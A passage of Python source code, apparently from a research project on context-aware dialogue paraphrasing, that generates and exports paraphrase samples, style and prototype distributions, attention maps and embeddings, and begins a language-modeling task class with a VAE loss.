Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() phrase_proto_dist = list() proto_dist_descriptions = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() gen_proto_dists = gen_proto_dists.cpu().numpy() par_1_proto_dist = par_1_proto_dist.cpu().numpy() par_2_proto_dist = par_2_proto_dist.cpu().numpy() par_proto_dist = np.concatenate([par_1_proto_dist, par_2_proto_dist], axis=0) par_1_words = self.gen_batch[0] par_1_lengths = self.gen_batch[1] par_2_words = self.gen_batch[2] par_2_lengths = self.gen_batch[3] par_1_slots = self.gen_batch[4] par_1_slot_lengths = self.gen_batch[5] par_2_slots = self.gen_batch[6] par_2_slot_lengths = self.gen_batch[7] for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) for proto_index in range(gen_proto_dists.shape[0]): s = "" if np.max(gen_proto_dists[proto_index]) == 1.0: s = "Proto %i" % np.argmax(gen_proto_dists[proto_index]) elif np.sum(gen_proto_dists[proto_index] == 0.5) == 2: proto_indices = np.where(gen_proto_dists[proto_index] == 0.5)[0] s = "Proto %i and %i" % (proto_indices[0], proto_indices[1]) elif np.all(gen_proto_dists[proto_index] == gen_proto_dists[proto_index,0]): s = "All proto" else: s = "Unknown proto" proto_dist_descriptions.append(s) for par_index in range(par_proto_dist.shape[0]): proto_dist_string = "[%s]" % (", ".join(["%4.2f%%" % (par_proto_dist[par_index,i]*100.0) for i in range(par_proto_dist.shape[1])])) phrase_proto_dist.append(proto_dist_string) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases, phrase_proto_dist)) self.model.train() return gen_list, proto_dist_descriptions def generate_beamsearch_batchwise(self, batch_torch, beam_search_method="diverse"): self.model.eval() # 1.) 
Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): p1_res_beam, p2_res_beam, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, beams=8, switch_rate=1.0, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=True, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0), only_par_1=False, beam_search_method=beam_search_method) _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths = p1_res_beam _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths = p2_res_beam # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() def pad_UNK_weights(UNK_weights): max_shape_1 = max([g.shape[1] for g in UNK_weights]) max_shape_2 = max([g.shape[2] for g in UNK_weights]) UNK_weights = np.stack([np.concatenate([np.concatenate([g, np.zeros((g.shape[0], max_shape_1-g.shape[1], g.shape[2]))], axis=1), np.zeros((g.shape[0], max_shape_1, max_shape_2-g.shape[2]))], axis=2) for g in UNK_weights], axis=0) return UNK_weights gen_par_1_UNK_weigths = [g.cpu().numpy() for g in gen_par_1_UNK_weigths] print([g.shape for g in gen_par_1_UNK_weigths]) gen_par_1_UNK_weigths = pad_UNK_weights(gen_par_1_UNK_weigths) gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = [g.cpu().numpy() for g in gen_par_2_UNK_weigths] gen_par_2_UNK_weigths = pad_UNK_weights(gen_par_2_UNK_weigths) gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def generate_style_dist_batchwise(self, batch_torch): self.model.eval() # 1.) 
Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, _, _, _, _ = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths, gen_proto_dists, par_1_proto_dist = self.model.generate_style_dist((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths), max_generation_steps=40) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths, _, par_2_proto_dist = self.model.generate_style_dist((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths), max_generation_steps=40) # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() phrase_proto_dist = list() proto_dist_descriptions = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() gen_proto_dists = gen_proto_dists.cpu().numpy() par_1_proto_dist = par_1_proto_dist.cpu().numpy() par_2_proto_dist = par_2_proto_dist.cpu().numpy() par_proto_dist = np.concatenate([par_1_proto_dist, par_2_proto_dist], axis=0) print("Shape gen_par_1_UNK_weigths", gen_par_1_UNK_weigths.shape) par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) for proto_index in range(gen_proto_dists.shape[0]): s = "" if np.max(gen_proto_dists[proto_index]) == 1.0: s = "Proto %i" % np.argmax(gen_proto_dists[proto_index]) elif np.sum(gen_proto_dists[proto_index] == 0.5) == 2: proto_indices = np.where(gen_proto_dists[proto_index] == 0.5)[0] s = "Proto %i and %i" % (proto_indices[0], proto_indices[1]) elif np.all(gen_proto_dists[proto_index] == gen_proto_dists[proto_index,0]): s = "All proto" else: s = "Unknown proto" proto_dist_descriptions.append(s) for par_index in range(par_proto_dist.shape[0]): proto_dist_string = "[%s]" % (", ".join(["%4.2f%%" % (par_proto_dist[par_index,i]*100.0) for i in range(par_proto_dist.shape[1])])) phrase_proto_dist.append(proto_dist_string) # 5.) 
Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases, phrase_proto_dist)) self.model.train() return gen_list, proto_dist_descriptions def generate_styles_batchwise(self, batch_torch): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths = self.model.sample_reconstruction_styles((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths, contexts_1_words, contexts_1_lengths), max_generation_steps=40, num_samples=8, sample_context=False, sample_gt=True) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths = self.model.sample_reconstruction_styles((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths, contexts_2_words, contexts_2_lengths), max_generation_steps=40, num_samples=8, sample_context=False, sample_gt=True) # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def extract_gt_attn(self, batch_torch): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, _, _, par_1_slots, par_1_slot_lengths, _, _, _, _, _, _ = batch_torch with torch.no_grad(): par_1_attn_semantic, par_1_attn_style, par_1_proto_dist = self.model.encode_gt(_input=(par_1_words, par_1_lengths, par_1_slots, par_1_slot_lengths)) # 3.) 
Reconstruct generated answer and input input_phrases = list() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() reconstruct_sentences(par_1_words, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, slot_preds=None, list_to_add=input_phrases, add_sents_up=True) # 5.) Put everything in a nice format attn_info = [] print("Attention semantic", par_1_attn_semantic) print("Style attention", par_1_attn_style) for sent_index in range(len(input_phrases)): info = ["Semantic attention: " + str(par_1_attn_semantic[sent_index].cpu().numpy()), "Style attention: " + str(par_1_attn_style[sent_index].cpu().numpy()), "Prototype distribution: " + str(par_1_proto_dist[sent_index].cpu().numpy())] attn_info.append(info) gen_list = list(zip(input_phrases, attn_info)) self.model.train() return gen_list def generate_slot_dist_images(self, writer, iteration): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) Push data through network par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): par_1_res, par_2_res, _, _, _, _, _, slot_1_res, slot_2_res, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn) del batch_torch _, par_1_UNK_weights, par_1_preds, par_1_lengths = par_1_res _, slot_1_lengths, slot_1_ids = slot_1_res par_1_UNK_weights = par_1_UNK_weights.cpu().numpy() par_1_preds = par_1_preds.cpu().numpy() par_1_lengths = par_1_lengths.cpu().numpy() par_1_slots = par_1_slots.cpu().numpy() par_1_slot_lengths = par_1_slot_lengths.cpu().numpy() slot_1_lengths = slot_1_lengths.cpu().numpy() slot_1_ids = slot_1_ids.cpu().numpy() id2word = get_id2word_dict() fig = plt.figure() slot_sents = reconstruct_sentences(slot_1_ids, slot_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, add_sents_up=False) pred_sents = reconstruct_sentences(par_1_preds, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, slot_preds=par_1_UNK_weights[:,:,1:], add_sents_up=False) for batch_index in range(par_1_UNK_weights.shape[0]): if slot_1_lengths[batch_index] == 0 or par_1_lengths[batch_index] == 0: continue fig = plt.figure() ax = fig.add_subplot(111) sent_attention_map = par_1_UNK_weights[batch_index, :par_1_lengths[batch_index], :slot_1_lengths[batch_index]+1] sent_attention_map = np.concatenate((sent_attention_map[:,0:1], sent_attention_map), axis=1) sent_attention_map[:,0] = (sent_attention_map[:,0] < 0.5) sent_attention_map[:,1] = 1 - sent_attention_map[:,1] sent_attention_map[:,2:] /= np.maximum(np.sum(sent_attention_map[:,2:], axis=-1, keepdims=True), 1e-5) sent_attention_map = np.transpose(sent_attention_map) cax = ax.matshow(sent_attention_map, cmap=plt.cm.gray, 
vmin=0, vmax=1) ax.set_yticklabels(["use slot (bin)", "use slot"] + slot_sents[batch_index]) ax.set_xticklabels(pred_sents[batch_index], rotation=90) ax.set_yticks(range(2 + slot_1_lengths[batch_index])) ax.set_xticks(range(par_1_lengths[batch_index])) ax.set_yticks(np.arange(-.5, 2 + slot_1_lengths[batch_index], 1), minor=True) ax.set_xticks(np.arange(-.5, par_1_lengths[batch_index], 1), minor=True) ax.grid(which='minor', color='k', linestyle='-', linewidth=1) # Add rectangle for the chosen slots for seq_index in range(sent_attention_map.shape[1]): if sent_attention_map[0,seq_index] == 1: best_ind = np.argmax(sent_attention_map[2:,seq_index]) + 2 ax.add_patch(Rectangle((seq_index-0.5,best_ind-0.5),1,1,linewidth=2,edgecolor=(0.5,1.0,0.5),facecolor='none')) plt.tight_layout() writer.add_figure(tag="train/%s_sample_attention_maps_%i" % (self.name, batch_index), figure=fig, global_step=iteration) plt.close() self.model.train() def finalize_summary(self, writer, iteration, checkpoint_path): # if not self.debug: # self.create_tSNE_embeddings(self.val_dataset, writer, iteration, prefix="val_") # self.create_tSNE_embeddings(self.train_dataset, writer, iteration, prefix="train_") self.export_whole_dataset(self.train_dataset, checkpoint_path, prefix="train_") self.export_whole_dataset(self.val_dataset, checkpoint_path, prefix="val_") def export_whole_dataset(self, dataset, checkpoint_path, prefix="", batch_size=128): self.model.eval() data, data_indices = dataset.get_all_sentences() num_batches = int(math.ceil(len(data) * 1.0 / batch_size)) if self.debug: batch_size = 4 num_batches = min(num_batches, 2) par_semantic_vecs, par_style_vecs, context_style_attn_vecs, context_style_vecs = None, None, None, None par_words = ["%i\t%s" % (d_index, " ".join(d.par_1_words)) for d, d_index in zip(data, data_indices)] context_words = ["\t\t".join([" ".join(c) for c in d.context_1_words]) for d in data] for n in range(num_batches): batch_data = data[n*batch_size:min((n+1)*batch_size, len(data))] with torch.no_grad(): batch_data_input = dataset._data_to_batch(batch_data, toTorch=True) batch_par, batch_par_length, _, _, batch_slots, batch_slot_lengths, _, _, batch_context, batch_context_length, _, _ = batch_data_input par_semantics, par_style, context_style_attn, context_style = self.model.encode_sent_context((batch_par, batch_par_length, batch_slots, batch_slot_lengths, batch_context, batch_context_length)) par_semantics = par_semantics.cpu().numpy() par_style = par_style.cpu().numpy() context_style_attn = context_style_attn.cpu().numpy() context_style = context_style.cpu().numpy() if n == 0: par_semantic_vecs, par_style_vecs, context_style_attn_vecs, context_style_vecs = par_semantics, par_style, context_style_attn, context_style else: par_semantic_vecs = np.concatenate([par_semantic_vecs, par_semantics], axis=0) par_style_vecs = np.concatenate([par_style_vecs, par_style], axis=0) context_style_attn_vecs = np.concatenate([context_style_attn_vecs, context_style_attn], axis=0) context_style_vecs = np.concatenate([context_style_vecs, context_style], axis=0) dir_path = os.path.join(checkpoint_path, prefix+self.name+"_export") os.makedirs(dir_path, exist_ok=True) np.savez_compressed(os.path.join(dir_path, "par_semantic_vecs.npz"), par_semantic_vecs) np.savez_compressed(os.path.join(dir_path, "par_style_vecs.npz"), par_style_vecs) np.savez_compressed(os.path.join(dir_path, "context_style_attn_vecs.npz"), context_style_attn_vecs) np.savez_compressed(os.path.join(dir_path, "context_style_vecs.npz"), context_style_vecs) 
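        # Note: the four arrays above are passed to np.savez_compressed positionally, so each
        # archive stores its matrix under numpy's default key "arr_0". A minimal, hypothetical
        # loading sketch for downstream analysis (not part of this module) would be:
        #   par_semantic_vecs = np.load(os.path.join(dir_path, "par_semantic_vecs.npz"))["arr_0"]
        #   par_style_vecs = np.load(os.path.join(dir_path, "par_style_vecs.npz"))["arr_0"]
        # The responses.txt / contexts.txt files written below hold the corresponding sentences.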
with open(os.path.join(dir_path, "responses.txt"), "w") as f: f.write("\n".join(par_words)) with open(os.path.join(dir_path, "contexts.txt"), "w") as f: f.write("\n".join(context_words)) def create_tSNE_embeddings(self, dataset, writer, iteration, prefix="", batch_size=64, max_number_batches=15): # tSNE embeddings of styles and semantics self.model.eval() # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) number_batches = min(number_batches, max_number_batches) context_style_embed_list = list() response_style_embed_list = list() semantic_embed_list = list() original_response_list = list() original_context_list = list() # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Saving %sembeddings for tSNE: %4.2f%% (batch %i of %i)" % (prefix, 100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") par_1_words, par_1_lengths, _, _, par_1_slots, par_1_slot_lengths, _, _, contexts_1_words, contexts_1_lengths, _, _ = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=False, noun_mask=None, mask_prob=0.0) par_semantics, par_style = self.model.encode_sentence((par_1_words, par_1_lengths, par_1_slots, par_1_slot_lengths)) _, context_style = self.model.encode_sentence((contexts_1_words, contexts_1_lengths, None, None)) semantic_embed_list.append(par_semantics) response_style_embed_list.append(par_style[0]) context_style_embed_list.append(context_style[0]) par_1_words = par_1_words.cpu().numpy() par_1_lengths = par_1_lengths.cpu().numpy() par_1_slots = par_1_slots.cpu().numpy() par_1_slot_lengths = par_1_slot_lengths.cpu().numpy() contexts_1_words = contexts_1_words.cpu().numpy() contexts_1_lengths = contexts_1_lengths.cpu().numpy() reconstruct_sentences(par_1_words, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, list_to_add=original_response_list) reconstruct_sentences(contexts_1_words[:,-1], contexts_1_lengths[:,-1], list_to_add=original_context_list) # -1 to only use last sentence semantic_embeds = torch.cat(semantic_embed_list, dim=0) response_style_embeds = torch.cat(response_style_embed_list, dim=0) context_style_embeds = torch.cat(context_style_embed_list, dim=0) print("Semantic embeds: " + str(semantic_embeds.shape)) print("Response style embeds: " + str(response_style_embeds.shape)) print("Context style embeds: " + str(context_style_embeds.shape)) print("Original response length: " + str(len(original_response_list))) print("Original context length: " + str(len(original_context_list))) writer.add_embedding(semantic_embeds, metadata=original_response_list, tag=prefix + "Semantic_" + self.name, global_step=iteration) writer.add_embedding(response_style_embeds, metadata=original_response_list, tag=prefix + "Response_Style_" + self.name, global_step=iteration) writer.add_embedding(context_style_embeds, metadata=original_context_list, tag=prefix + "Context_Style_" + self.name, global_step=iteration) self.model.train() def export_best_results(self, checkpoint_path, iteration): if False and (not self.debug and iteration < 10000): # Reduce amount of times this function is called. Do not expect best results before 20k return if self.name == "ContextAwareDialogueParaphraseSmall": return print("Exporting best results of %s..." 
% self.name) TOK_WIDTH = 200 gen_list = self.generate_examples() results_gen = "-- Iteration %i --\n" % iteration for g in gen_list: results_gen += "\n\n" + "="*TOK_WIDTH + "\n" results_gen += g[2] + "\n" results_gen += "-"*TOK_WIDTH + "\n" results_gen += "Generated | %s\n" % (g[3]) results_gen += "Generated (context) | %s\n" % (g[4]) results_gen += "Ground truth | %s\n" % (g[1]) results_gen += "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_generation.txt"), "w") as f: f.write(results_gen) gen_list = self.generate_random_style_samples() results_random_styles = "-- Iteration %i --\n" % iteration for g in gen_list: results_random_styles += "\n\n" + "="*TOK_WIDTH + "\n" results_random_styles += "Input:\t%s\n" % (g[0]) results_random_styles += "-"*TOK_WIDTH + "\n" results_random_styles += "\n".join(["Gen (%i):\t%s" % (i, e) for i, e in enumerate(g[1])]) results_random_styles += "\n" + "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_random_styles.txt"), "w") as f: f.write(results_random_styles) if True or (self.model.encoder_module.use_prototype_styles and not self.model.encoder_module.no_prototypes_for_context): gen_list, proto_dist_list = [], [] gen_style_list = [] gt_attention_maps = [] gen_beam_std_list, gen_beam_sto_list, gen_beam_div_list = [], [], [] batch_size = 64 number_batches = int(math.ceil(self.test_dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(number_batches, 2) def export_list(gen_resp_list, name): res = "-- Iteration %i --\n" % iteration for g in gen_resp_list: res += "\n\n" + "="*TOK_WIDTH + "\n" res += "Input:\t%s\n" % (g[0]) res += "-"*TOK_WIDTH + "\n" res += "\n".join(["(%i):\t%s" % (i, e) for i, e in enumerate(g[1])]) with open(os.path.join(checkpoint_path, "%s_%s.txt" % (self.name.lower(), name)), "w") as f: f.write(res) for batch_index in range(number_batches): batch_data_input = self.test_dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=False, noun_mask=False, mask_prob=0.0) glist, protolist = self.generate_style_dist_batchwise(batch_data_input) gslist = self.generate_styles_batchwise(batch_data_input) gt_attn_maps = self.extract_gt_attn(batch_data_input) # start_time = time.time() # gbstdlist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="standard") # print("Finished batch of standard beam search in %4.2fs" % (time.time() - start_time)) # start_time = time.time() # gbstolist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="stochastic") # print("Finished batch of stochastic beam search in %4.2fs" % (time.time() - start_time)) # start_time = time.time() # gbdivlist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="diverse") # print("Finished batch of diverse beam search in %4.2fs" % (time.time() - start_time)) gt_attention_maps += gt_attn_maps gen_list += glist proto_dist_list += protolist # gen_beam_std_list += gbstdlist # gen_beam_sto_list += gbstolist # gen_beam_div_list += gbdivlist gen_style_list += gslist export_list(gt_attention_maps, "gt_attention_maps") export_list(gen_beam_std_list, "beam_standard") export_list(gen_beam_sto_list, "beam_stochastic") export_list(gen_beam_div_list, "beam_diverse") export_list(gen_style_list, "styles") # gen_list, proto_dist_list = self.generate_style_dist() results_style_dist = "-- Iteration %i --\n" % iteration for g in gen_list: results_style_dist += "\n\n" + "="*TOK_WIDTH + "\n" results_style_dist += "Input:\t%s\n" 
% (g[0]) results_style_dist += "Proto distribution:\t%s\n" % (g[2]) results_style_dist += "-"*TOK_WIDTH + "\n" results_style_dist += "\n".join(["(%s):\t%s" % (name, e) for name, e in zip(proto_dist_list, g[1])]) results_style_dist += "\n" + "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_style_dist.txt"), "w") as f: f.write(results_style_dist) class ContextAwareLanguageModelingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_ContextLM_Book_datasets): super(ContextAwareLanguageModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareLanguageModeling" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.summary_dict = {"loss_rec": list(), "loss_VAE": list(), "KL_scheduler": list(), "loss_combined": list(), "style_mu": list(), "style_sigma": list()} def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug, num_context_sents=get_param_val(self.model_params, "num_context_turns", 2)*2-1) def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." par_words, par_lengths, contexts_words, contexts_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True) current_tf_ratio = self._get_tf_ratio(iteration) par_res, context_style = self.model.language_modeling(_input = (par_words, par_lengths, contexts_words, contexts_lengths), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio) loss, loss_VAE, acc = self._calculate_loss(par_res, par_words, context_style) final_loss = loss + loss_VAE * self.KL_scheduler.get(iteration) self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["style_mu", "style_sigma"], [[context_style[1]], [context_style[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, context_style, par_style=None): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] else: print("[#] WARNING: Batch labels were not shortend. 
First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() ## Loss VAE regularization _, style_mu, style_std = context_style if par_style is not None: _, par_style_mu, par_style_std = par_style style_mu = torch.cat([style_mu, par_style_mu], dim=-1) style_std = torch.cat([style_std, par_style_std], dim=-1) loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) return loss, loss_VAE, acc def eval(self, dataset=None, batch_size=64, label_lengths=False, noun_mask=False): return float('nan'), dict() def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), 